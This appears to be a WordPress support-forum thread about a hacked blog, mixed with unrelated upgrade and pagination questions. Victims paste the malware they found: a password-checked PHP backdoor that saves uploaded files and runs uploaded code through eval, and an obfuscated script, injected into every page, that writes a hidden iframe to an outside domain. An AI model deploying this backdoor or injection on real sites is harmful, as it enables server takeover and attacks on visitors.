elorgwhee

Tried to downgrade back to 2.71 and was still experiencing the same issues. I could see my content, but was getting 404’s on wp-admin/* and wp-login.php so I wasn’t able to change any admin settings or login and post any entries, etc.

Gave it a couple of days to mull it over and figured it out. I was unzipping everything locally on my computer and uploading the unzipped files. I should’ve known better. Uploaded the zip file, unzipped on the server – everything works fine now ??

I’ve also tried renaming the plugins folder, editing the wp-settings file to change the memory settings from 32MB to 64MB, and removing the extra line of whitespace at the end of the wp-config.php file.

Still no luck / no change.

Thanks GamerZ for replying to this. I’m running into this same issue and have been having a hard time trying to find a solution.

I just want to be able to have my front page display only the items in the “News” category, and /Journal to display items in the “Journal” category, etc. Apparently when I filter the loop, the pagination breaks… =\

Tignarius: It’s not the wordpress upgrade. I’ve been getting those on my site (as well as friends) for over a year now. It looks like they just finally found your site.

On another note, take a look through the code in your posts if you have time. I started to notice that around the same time I started getting new bogus registration requests, I was also being hit by sql injections that were putting code in my blog entries. I’m not sure if that was related or not, I just happened to notice it around the same time because one of the injections actually broke my site which made it obvious.

I’d either disable registrations or setup some sort of captcha.

Good luck!

Yeah, I’ve considered that. It’s really tempting. But I have a bit of custom code that was affected as well – so there’s no reinstalling it. I’d have to hope that my latest backup captured any of my recent updates to it.

Maybe I’ll just do that for wordpress and vanilla for now so at least those parts don’t continue to crash people’s computers. lol

Or maybe I can just cut over to the new site without any templates or plugins. It won’t be pretty, but it would work for now.. *rubs chin*

Thanks whooami & Ivovic.

Between work, I’m still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I’m not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it’s all manual.
>_<

I’ve been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I’m more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can’t rule out that it wasn’t my fault, nor the fact that I’m on a shared server. In moving to a new server, I’m installing everything clean and changing all passwords, etc. – but I’m not finished with the setup yet so I have to deal with this issue until I am.

I would like to think that just because there’s at least one person in this thread who was affected by this that doesn’t seem to have much of a clue and is a bit obnoxious about asking for help, that you aren’t assuming that everyone affected by this is a complete idiot.

@ivovic –
Yeah, I’m currently working on fresh installs with all new passwords, etc., on a new server. Hopefully this will help. (So far?) it’s only my old install on my old server.

Another update –
Is anyone running Vanilla forum? If it started in wordpress, then it “leaked” into my forum as well. This is going to take forever to clean up.

Looks like they tagged all the php files – and even the files like the readme.html – though that file obviously doesn’t have the <?php tags in it.

There are these seemingly random files that start with pre_ that don’t appear to have any normal wordpress code in it. They have the page of blank space at the top and bottom. Looks like they found another php file and created a new file with that name but added “pre_” to the beginning?? “pre_hello.php” in the plugins directory, “pre_wp-cron.php” in the root directory…

Here’s the code:

<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','b40395b7ce76774c614419fbeb3dd9a9');

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
      {
      testdata('save_ok');
      };
      //eval($code);
  } else {
    testdata('save_fail');
  };

  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"]))
  {
      eval($code);
      testdata('ok');
  } else {
    testdata('fail');
  };

} else {
  testdata('pass');
};

testdata('end');
echo "</pre>";
?>

I was hacked just today as well with the same symptoms mentioned above (the ActiveX and the wp-stats, etc). This appears to be almost a bi-monthly thing and my friends and I started to suspect some sort of vulnerability in the theme I’m using (Hemmingway) – though this particular problem is new. Normally the posts are hacked with some sort of sql injection that causes the rest of the site to not load. It’s not normally this bad.

This was inserted into the bottom of ALL of my pages – they even got the 404.php! I’m going through and removing all the code now. It looks like I can’t even load /wp-admin/ either??

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

I have the following plugins:
Akismet
Awesomnews (not used or active though)
maintenance mode
pownce-for-wordpress (not yet used or active I don’t think – can’t confirm cuz I’m still cleaning up the code so I can login)
wordpress-automatic-upgrade
hello dolly
stats

They even got my plugins php files?!?
I also found some “pre_hello.php” file in my plugins directory. It looks like 3 pages of stuff – the first and last are all just carriage returns while the middle is code with lots of “testdata” bits.